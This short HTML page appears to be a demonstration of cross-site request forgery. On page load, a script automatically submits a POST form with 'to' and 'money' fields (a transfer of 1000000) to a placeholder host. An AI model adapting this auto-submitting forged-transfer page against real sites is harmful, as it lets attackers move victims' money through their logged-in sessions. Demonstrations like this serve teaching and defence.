<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Document</title>
  </head>
  <body>
    <form action="https://www.baidu.com" method="post">
      <input type="text" name="to" value="11111" />
      <input type="text" name="money" value="1000000" />
    </form>

    <script>
      document.querySelector('form').submit();
    </script>
  </body>
</html>
